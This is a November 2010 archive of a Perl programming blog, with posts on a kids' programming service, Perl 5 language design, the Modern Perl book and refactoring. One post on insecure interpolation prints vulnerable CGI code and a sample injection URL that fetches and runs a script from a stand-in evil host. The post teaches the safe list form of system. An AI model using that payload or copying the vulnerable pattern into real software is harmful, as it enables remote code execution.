November 2010 Archives

Update: Dave explains ClubCompy and programs the ClubCompy shell on YouTube.

I've been working recently on ClubCompy, a service designed to introduce kids to computers and programming. The technology is interesting; it's HTML 5 and JavaScript and some other backend technologies. Dave and I have pushed the limits of our knowledge about software development, graphics programming, virtual machines, language design, parsing, education, game programming, publishing, and more.

It's been quite an experience, and we have much more work to do. We've launched a Kickstarter campaign to promote ClubCompy, and we would love for you to spread the news far and wide.

I've tried to approach the project from the point of view of our users rather than as a technologist. (I can and will write a lot more about the technologies, the design, and our future plans. I have a crazy story about a little Perl 5 program which works with the GIMP image program and custom palettes and generates 8-bit sprites suitable for embedding in little programs. As well, Parrot fans take note of this auspicious sentence.) Our vision—what's more important to Dave and me—is both respecting the history of computing from the early '80s and giving the next generation of computer users great opportunities to play, to discover, to explore, and to create new things. If you have a modern web browser, you can program an emulation of an 8-bit minicomputer with a full-blown programming language built in. How geeky is that?

I've relied on my personal history to shape this project. Nostalgia sprinkles fairy dust on all good memories, but even so, some sort of magic was in the air in the very early '80s. Maybe you remember too.

I was 6 or 7 the first time I used a computer. I remember it well. I walked into the special education classroom of Jackson Elementary school and saw it in the corner. Class hadn't begun yet, so I sat down, turned it on, and flipped to the first page of the manual.

A simple program stared back at me.

I hunted and pecked and managed to type out the whole program. It must have been five or six lines long. It didn't work; I'd typed it wrong. I sat and stared and realized my mistake.

The second time I typed the program, everything worked. I don't remember what the program did--probably greeted me and flashed the colors on the screen--but I was 6 or 7, and I'd told the first computer I'd ever touched what to do.

Our school district was fortunate. Computers started appearing in other classrooms. I could convince my parents to buy me a magazine with programs listed in it, then spend time after school or at lunch transcribing the programs and, as often as not, eventually making my way through a couple of pages of text and funny symbols to discover that, despite my typos, I could actually do something interesting.

I didn't notice then that all of this typing had sunk into my brain. I did notice that my typing had improved, but I didn't stop to think the first afternoon I wrote out in longhand what I thought might somehow be a computer game where you move a mouse through a maze to find some cheese. I remember going to a friend's house to type it on his brother's computer. It didn't work, not completely, but more of it worked than should have worked.

I didn't think about that all. I didn't worry that I could break a machine the school district or someone else's parents had spent a few hundred dollars to buy. I didn't have to ask permission if I could write a program (though teachers didn't want us playing games during school hours, of course, or getting in fights if more than one person wanted to play with the computer). I didn't even question the idea that when I sat down, I had to type instructions to make the computer do something. I took it for granted that it wanted me to write a program or give it a command.

Back in those days, when you turned on the computer, it sat there blinking at you, waiting for you to type something. That's it. If you were lucky, you had a tape drive or a floppy drive, and you could load a program, but otherwise all you had is what you'd created yourself.

What a time I had. When my parents could afford to buy our own, I hooked it up to the TV and wrote a little program that sent multicolored hot air balloons bouncing around the screen as a Father's Day card for my father. As a book report when I was 12 I wrote a little adventure program in which you could experience scenes from the book.

Yes, I played a lot of computer games. Yes, I spent a lot of money buying those magazines with type-in listings. Yes, I made a lot of amateurish mistakes and annoyed my parents by using the family TV when I could have been outside riding my bike or playing with the neighbor kids.

But I learned something. I learned that this lump of plastic and silicon and wires and who knows what else was more than a passive device. It was a tool. I could learn to use it. I could explore its secrets. I could build things with it, use my imagination to produce ideas which I could realize in part or in whole. I'm sure many of you have similar stories. Some of the details may differ, but something sparked your interest, and a series of small ah-ha moments guided your explorations.

We want to help as many kids as possible create those moments themselves.

When I showed ClubCompy to my seven year old nephew, he drew pictures with the turtle for a while, then looked up at me and said, "Uncle? What if there were a hundred turtles, and they could all draw? And what if you could make the turtle twice as fat as he is now? And what if he turns in a really really big circle, what would happen then?"

I told him that everything he mentioned was possible. After all, when you're seven and someone hands you a magical device that can do anything you imagine, you ought to dream big, really big dreams.

When Do You Report Semantics Errors?

| 4 Comments

I haven't commented on David Golden's work to allow references as the first operands to push and pop because I have mixed feelings about the feature. The simple explanation is that Perl 5.12 requires an explicit array as the first operand of both keywords:

push @some_array, $some_scalar;

my $other_scalar = pop @{ $some_array_reference };

With David's changes, you will also be able to write this code for Perl 5.14:

push $some_array_reference, $some_scalar;

my $other_scalar = pop $another_array_reference;

I like this change for a couple of reasons. First, it reduces the visual clutter of dereferencing. I've never cared for Perl 5's dereferencing syntax (it may be my least favorite syntactical part of the language), and David's right in that it's unnecessary in many cases here. Second, this change improves consistency in that all of these array manipulating functions obviously operate on containers, not the values of those containers. That is to say, pushing onto or shifting from an array modifies the contents of the array as a whole. It doesn't coerce those contents into a list and perform a transformation on the list. The consistency of writing, in effect, "It doesn't matter what kind of syntactic element represents an array—a bare array, a reference, or even something with tied array-like magic—as long as it behaves properly, that's the right thing to use here." appeals to me. (See also The Why of Perl Roles for an exploration of this design principle.)

Even so, I perceive a lessening of compile-time safety, even as I know that's probably an illusion.

If I write:

my @array = qw( some values here );
push @array, 'some other value';

... everything is fine. @array is obviously an array and is obviously correct. Yet if I write:

my @array = qw( some values here );
push @rray, 'some other value';

... then strict will catch the typo. @rray is obviously an array, but it's (probably) not present in the program at this point. So far so good. Yet if I write with 5.12:

my @array = qw( some values here );
push $array, 'some other value';

... that's obviously an error, because @array and $array are different variables. (The latter is most likely a typo, but that's just the peculiarly silly naming convention of this example, so don't count on it.)

With 5.14, I could also write:

my @array = qw( some values here );
push $hash_ref, 'some other value';

... and the error won't be visible until runtime, when push realizes its first operand isn't anything array-like at all. Of course, nothing prevents me from making a similar typo with Perl 5.12:

my @array = qw( some values here );
push @{ $hash_ref }, 'some other value';

... where the difference is a bit of extra (and, to my mind, somewhat ugly) syntax.

I know this isn't a peculiar disadvantage of the change, and I like the change overall, but it still seems to me to trade a little bit of compile-time safety for the potential for run-time errors. I'll use it and I'll get used to it and I'm certain I'll like it, especially with complex data structures. Perhaps it's my familiarity with explicit deferencing that gives the illusion of compile-time safety.

(You can use Vincent Pit's autovivification pragma to avoid some of the potential damage of mistakes with explicit or implicit dereferencing, but again that's not a compile-time fix. I suspect what I really want here is Perl 6's gradual typing system.)

Unnecessary and Insecure Interpolation

A couple of days after writing the Petty Tyranny of Good Habits, I stumbled across an example. I still don't quite understand what the Pinata Buster code does, but I found a security hole two seconds into reading the code. (I notified them and they updated their program quickly, so I'm avoiding the full disclosure debate debacle.)

The original code looked something like:

#!/usr/bin/perl -w

my @values = split(/&/,$ENV{'QUERY_STRING'});
foreach my $i (@values) {
    ($varname, $mydata) = split(/=/,$i);
}

system( "echo '$mydata' >> /home/rhett/usernick" );
system('/home/rhett/music_player.rb &');
system('/home/rhett/servos/phidgets-examples/AdvancedServo-simple &');

The emboldened line shows the problem. (Yes, splitting the query string on & is horribly buggy on its own, but that's not a security flaw in and of itself.)

This isn't quite a Bobby Tables moment, in that the potential for mischief can affect anything the user account under which this program runs, and not just a SQL database.

(If you don't see the security problem, think about what would happen if someone invoked this program with the URL http://example.com/buggy.cgi?exploit='; wget http://evil.example.com/exploit.pl && $^X exploit.pl; echo "all is fine", properly URL-encoded of course.)

This is the same type of problem which makes this code:

# DO NOT USE
open my $fh, "$some_file_name" or die "Security breach didn't work: $!";

... much less secure than the modern version:

# SAFE TO USE
open my $fh, '<', $some_file_name or die "Cannot read from input file: $!";

This is not a problem you can (entirely) alleviate by vetting the content of the string; it's difficult to craft a regex or a series of transformations to remove every possible combination of characters which may cause unintended behavior. You should continue to vet the sanity of the contents of these strings to help with security and safety, but the most reliable way to avoid unintentional interpolation problems with untrusted user input is to avoid interpolation altogether, whether with the three-arg form of open or with the list form of system.

Note that even though the example program has replaced the offending system with direct file access using two-arg open, it does not interpolate untrusted user input in an unsafe fashion. It's still clunky code, but it's safer.

Again, the unsafe forms of open and system are merely warning signs. (This pattern of program isn't inherently bad. I have a very useful shell script written in Perl 5 which uses a similar pattern of string manipulation and system calls because string manipulation in bash is painful.) The problem is interpolation of untrusted user input in places where untrusted characters may produce unintended behavior.

Then again, the safe forms of open and system exist to avoid that problem altogether.

The Petty Tyranny of Good Habits

| 1 Comment

The most useful general purpose tool I've ever owned is a Leatherman. It has pliers, a knife, wire cutters, two screwdriver heads, a bottle opener, a file, and a punch tool. It's great to keep at arm's reach for those occasions when I need one of those tools for a moment. It's quick and easy, even if it's not always the rightest tool.

If I wanted to make coleslaw, I could cut cabbage with it (but cutting cabbage is easier with a mandolin slicer).

If I wanted to tighten the handle of a drawer, I could use one of the screwdriver blades (though a dedicated screwdriver of the appropriate size offers more leverage).

If I had to open a paint can, I could use one of the other small blades (though that takes more work than using a real pryer).

I'm sure I could even break through rotten sheet rock with the tool if I didn't have a sledgehammer handy.

Go to a restaurant and you won't see the prep chefs shredding cabbage with a Leatherman. Go to a cabinetry shop and you won't see carpenters driving screws with a Leatherman. Go to an paint shop and you won't see the mixers opening cans with a Leatherman. It's a great tool for quick and dirty things, but it doesn't scale to professional uses.

If only programmers could exhibit the same degree of professionalism.

Consider the debate over Ugly Old Perl:

  • "Why should I change working code?"
  • "Isn't there more than one way to do it? Stop being so rigid!"
  • "The old way works just fine!"
  • "This has never failed for me before."
  • "You're just a follower of fashion!"
  • "You're a petty tyrant who loves to tell other people what to do."

Here's the thing. If all you have is a Leatherman and you have a really quick job you can get done in ten seconds, that's one thing. (It still helps if you know what you're doing; opening a paint can with the knife is a great way to break the tool and lose a lot of blood.) If you need to do something else, bad habits don't scale.

If you're writing a tiny program that no one but the five-minutes-in-the-future-you will ever have to read and you know all of the characteristics of user input and output and the security considerations, go ahead and use global variables. Go ahead and leave your code unfactored. Go ahead and ignore the error codes of system calls. If the sole determinant of how well you've programmed is how quickly you can get from having no program to having a program and no one never, ever, ever needs to maintain it, make as much of a mess as you want.

With that said, I know very few programs which don't need to scale for maintainability. Sure, that function you've written just now gets away with clobbering a global filehandle without any ill effect you can detect, but can you guarantee it will continue to do so while other people write other code in other parts of the program? Can you guarantee that all code called from that function will respect the global filehandle you've created?

Good habits like lexical encapsulation, checking for error codes, and avoiding all unnecessary interpolation of variables you are (at least for now) confident are always completely safe help you enforce those guarantees and keep confidence in a system as it grows and changes under the hands of other people (including future you).

That's why it's important to teach novices the safest way to program first, and then show them how to manage working with quick and dirty code. Set their habits appropriately so that their code will help, not hinder, their ability to write correct and maintainable code.

The Book is Out!

| 13 Comments

After countless commits, the generosity of dozens of proofreaders, and far too long proofreading the index, Modern Perl: the book is available!

You can buy a lovely print version from any well-stocked online vendor (and you're more than welcome to walk into your favorite neighborhood bookstore and request a special order given the book's ISBN: anyone who can order from Ingram can get the book in stock.) The ISBN-10 is 0-9779201-5-1 and the ISBN-13 is 978-0-9779201-5-0. Either should work.

If you prefer an electronic version, my publisher has agreed to make available both letter- and A4-sized versions of the book suitable for printing or browsing on your favorite device. We're also working on an ePub version. (Getting clickable intertextual links working in ePub was trickier than in PDF, so go figure—but isn't it nice to have clickable links in an index?)

These are free of cost and free of DRM, but not free of obligation. Your duty is to share the book with everyone who needs it. Give away the PDFs (and the ePub) far and wide. Write reviews. Cite it on the beginners mailing list. Seed it on BitTorrent. Host it on your own site.

We ask (but do not require) that if you find the book useful, you consider donating a fair value to help us produce more books of this type.

Ultimately we produced this book because we believe that the world needs more great books about technology, especially modern Perl 5. Please help prove us right.

The brand-new RHEL 6 includes a modernish version of Perl 5, only three stable releases obsolete. (Perl 5.10.1 is almost 15 months old, and it's also the oldest version of Perl 5 I consider using on any current project.) That's the good news.

The bad news is that RHEL 6 will stick around for several years, just as RHEL 5 did. RHEL 5 uses Perl 5.8.8 (almost 5 years old and six stable releases obsolete). RHEL 4 is also still around. It uses Perl 5.8.5 (almost six and a half years old and nine stable releases obsolete).

By the time RHEL 6 retires in late 2015 or 2016, the current stable release of Perl 5 will be 5.20.2 or 5.20.3. Assuming two minor stable releases of each major version, RHEL 6's Perl 5 will be fourteen stable releases out of date.

Bluntly, RHEL sells you the belief that you can build on the foundation of the software they provide and not worry about the pesky details of who actually wrote the software and how they develop it. For the hundreds or thousands of dollars enterprise customers pay Red Hat to support obsolete software such as Perl 5, Red Hat employs (to my knowledge) no core Perl 5 developers. That is to say, your support dollars don't actually go to anyone with the knowledge or authority to patch Perl 5 to meet your needs, especially after the core developers have explicitly disclaimed responsibility or desire to support ancient releases.

(I don't mean to pick on Red Hat alone here; the latest Solaris release, Solaris 10, includes Perl 5.8.4, six and a half years old and nine stable releases obsolete.)

How can anyone characterize the reliance on a vendor Perl 5 from an Enterprise Distribution as anything other than irresponsible and risky? At some point, maybe it's worth gently nudging these vendors to rename the creaky old software in their default installs to indicate its obsolescence and lack of support from the actual developers of Perl 5. The word encystation has its charms, though I suppose nacre is easier to spell.

For everyone else, free yourself from the tyranny of obsolescence foisted upon you by the Enterprise World and install a modern release of Perl 5 with App::perlbrew.

Compile-Time Pollution Checking

| 2 Comments

I fixed a bug in some under-tested code yesterday while writing unit tests.

package Some::Module
{
    use Modern::Perl;
    use Moose;

    # Moose attributes here

    sub some_useful_method
    {
        my ($self, $value) = @_;

        my $scrubbed_value = Some::Helper::some_function( $value );
        $self->set_value( $scrubbed_value );
    }
}

The details aren't interesting, but this is the minimal example necessary to show the problem. If you don't immediately see it, here's an alternate version of the method which would have made the error obvious:

   sub some_useful_method
    {
        my ($self, $value) = @_;

        my $scrubbed_value = some_function( $value );
        $self->set_value( $scrubbed_value );
    }

In this case, the desire not to pollute the current namespace with auxiliary functions defined elsewhere was the culprit. The solution was to add a single use Some::Helper; to the file.

Unfortunately, there was no way to catch this without writing a test which exercised the code path which triggered this call. The discipline of comprehensive testing would have caught it, as would the practice of importing functions from other packages explicitly. Couple that with namespace::autoclean to alleviate namespace pollution (thanks, Python!) and the damage is minimal, as long as everyone working on this code demonstrated sufficient discipline.

Then again, I can imagine a Perl 5 pragma which attempts to resolve all such symbols, qualified and not, at the end of compile-time and aborts the program otherwise. (Yes, there are AUTOLOAD concerns, but those are tractable.)

Sometimes a little more static typing up front can be useful.

I do a lot of exploratory programming. I prefer it, even. It's much more satisfying (and effective) to sketch out a simple design for the few most important features of a project, implement those, then analyze the whole thing in light of what I need to write next.

Often the experience of solving a problem that way helps me to understand what I did right and what I did wrong. What was difficult to write? What was difficult to test? What will I have to change to account for new features?

Refactoring, in my mind, is a disciplined process of rearranging source code to improve its maintainability, its correctness, and its testability. It's satisfying to extract a third entity (a class or a role) from two other entities. It's very satisfying to collapse several duplicate or near-duplicate pieces of code into a single line. It's powerful to delete code and fix bugs and add features.

One of the main benefits I've achieved from learning Haskell is the profound understanding that a function composed of two or three lines of pure code is easy to test and easy to reuse. The same goes for Smalltalk, where a method of two or three lines may not be pure, but it's very powerful and often very reusable.

In Perl 5, this refactoring usually follows several stages: from procedural code to objects to roles to very small methods. In that final stage, a handful of design constraints govern how I approach my refactorings:

  • Can I name the extracted method appropriately?
  • Does it have a single obvious return value?
  • Does it need more than two or three parameters? (A list of items over which to iterate counts as a single parameter.)
  • If I were to use mocking to test the method, how many passes do I need to make through it to get full coverage? How much external data do I need to set up and tear down to test it appropriately?

(Similar questions apply to refactoring C code, but C's relative lack of abstractions compared to Perl 5—let alone modern Perl 5 with Moose—makes that work more difficult. You can circumnavigate a sea of function pointers stored in structs and callbacks and dummy parameters you need sometimes and don't other times and those lovely casts to void *, but at some point it's nice to join the state of the art circa 1985 at least.)

The result tends to be methods of five or six lines in length (not counting BSD-style braces and copious vertical whitespace). Now imagine if core Perl let me write:

method find_comments
{
    my $content = $self->content();

    return $1 if $content =~ /(\d+)\s+comments/i;
              || $content =~ /comments:?\s+(\d+)/i;

    return 0;
}

Saving a line or two on every one of these small methods is suddenly significant. Perhaps a philosophical (some might say sardonic) way to describe refactoring is "the systemic process of discovering the limitations of expressiveness and abstraction of your current programming language."

Perl 5's flexibility allows the CPAN to exist and CPAN's flexibility allows Perl 5 to evolve. Where would Perl be without the DBI or TAP? Imagine using Perl 5 without LWP or Moose or Perl::Critic.

Even so, the difference between a core language feature and a language extension created and maintained and distributed outside of the core is immense. Certainly some code uses non-DBI database modules, but it's clear that DBI is the foundation of all modern and widespread database use in Perl 5 today. Similarly, try using a test module without Test::Builder. Moose hasn't quite taken over the CPAN yet, but it's a matter of time.

In other words, some language extensions become so prevalent that they might as well be core parts of the language. (I realize not everyone uses the boilerplate of strict and warnings and autodie and feature in every Perl 5 file they write, but enough do that writing the silly little Modern::Perl was a worthwhile abstraction and encapsulation. One of my current projects has 41 Perl 5 files at the moment and some 1866 lines of code. 4.2% of my SLOC count would be that boilerplate if it weren't for this pragma. Boilerplate adds up.)

Unlike core language features, language extensions have no strong single authority to ensure that they interact appropriately. (There's always the post hoc bug report, with its finger pointing and blame and the end result of a Pragmatic if Horrifyingly unPlanned programming language.) Language designers can only do so much to encourage the developers of extensions to consider how to work well with each other.

If I'm right about the history and motives of the development of Perl 5, the fundamental unit of encapsulation in modern Perl is lexical scoping. If that's correct, the boundaries between various components of a Perl program must have their hard edges at lexical scopes.

In specific, the warnings pragma is friendlier than the -w command-line argument to Perl 5 because it does not enforce global behavior for code outside of its lexical scope.

In specific, using global variables is dangerous because it ignores encapsulation boundaries. (Yes, the existence of so many magic superglobals in Perl 5 itself is a language flaw.)

In specific, using UNIVERSAL::isa() to check the class of a referent is an unneighborly design error because it does not allow the referent to control its own nature.

In specific, using direct dereferencing access for object attributes is a mistake because it bypasses any validation or indirection which you shouldn't even know exists in a well-designed system.

None of these should be surprises to experienced Perl 5 programmers, but the implications run deeper—especially when discussing CPAN distributions.

With the caveat that a pragma (autovivification or autodie) with well-defined semantics (and adherence to lexical scoping) is acceptable precisely for its side effects (which do not leak out), a well-behaved CPAN distribution both sets a strict lexical boundary around its encapsulation and does not interfere with other code by its existence.

Moose is yet again a good example: it does not subvert Perl 5's default OO and it interacts with Perl 5's default OO. (In truth, the single legitimate main gripe about the effect Moose has on programs is solely its effect on program startup time.)

You can see the flip side of this principle in other languages which encourage monkeypatching of core language features without regard for lexical scoping of changes. This has the potential to devolve into a squatter's rights free-for-all, with the battle to be the first, most widely used library to scribble all over core behavior with little regard for the needs of anyone else. You might think that in these cases core always wins, but by not defining a mechanism for these types of extensions to work correctly, core can't win.

Then again, you have to get scoping right before any of this has a chance of working correctly.

Extensibility and Composability

Everyone always says that CPAN is Perl 5's killer feature, and that's true to an extent. Certainly the ability for me, an experienced Perl 5 programmer and CPAN contributor, to discover a need in my code, search CPAN for it, and install the right module within a minute is a powerful reason to write new code in Perl 5.

Certainly the language design of Perl 5 which made CPAN possible is a powerful example to emulate in Perl 6 and other languages.

Certainly the weight of contributions and the ease of publishing new distributions has created a critical mass which encourages new development on the CPAN as well as continued maintenance of existing projects. A loose collection of community standards and a design process which undertakes the barest minimum necessary to index and mirror tens of thousands of modules helps.

However.

Large portions of the CPAN (see also perl5i and why it matters) exist to make up for shortcomings of Perl 5's initial design. This is a normal, natural process. A language designed to solve problems unidentified at the design stage—problems which do not even exist during the design period—will make mistakes, and a language which includes safety valves for this sort of expansion has a stronger ecological potential than one which does not. (Imagine a 4GL which could only output uppercase letters, digits, and a few punctuation symbols to a 3270 terminal. How long will those programs last? (Don't answer that; more screen scraping exists than you would believe.))

No one had the CGI protocol (or FastCGI or WSGI) in mind when redesigning Perl from Perl 4 to Perl 5, and yet Perl 5 (and even Perl 4, if you have an RHEL or Solaris contract) worked very well with that protocol. Now we have Catalyst and Dancer and countless other systems, framework and not, built around a very simple line-oriented control protocol to send documents across the network.

In other words, I want to praise and inspire Perl and the CPAN, not to bury it.

Yet inspiring and improving Perl means assessing its strengths and weaknesses honestly and accurately. One of those weaknesses reveals structural flaws in Perl 5 and exhibits itself in one dramatic fashion through the CPAN: composability of language and abstraction.

I'll explore that idea in specific in the next installments.

Modern Perl: The Book

cover image for Modern Perl: the book

The best Perl Programmers read Modern Perl: The Book.

sponsored by the How to Make a Smoothie guide

Categories

Pages

About this Archive

This page is an archive of entries from November 2010 listed from newest to oldest.

October 2010 is the previous archive.

December 2010 is the next archive.

Find recent content on the main index or look in the archives to find all content.


Powered by the Perl programming language

what is programming?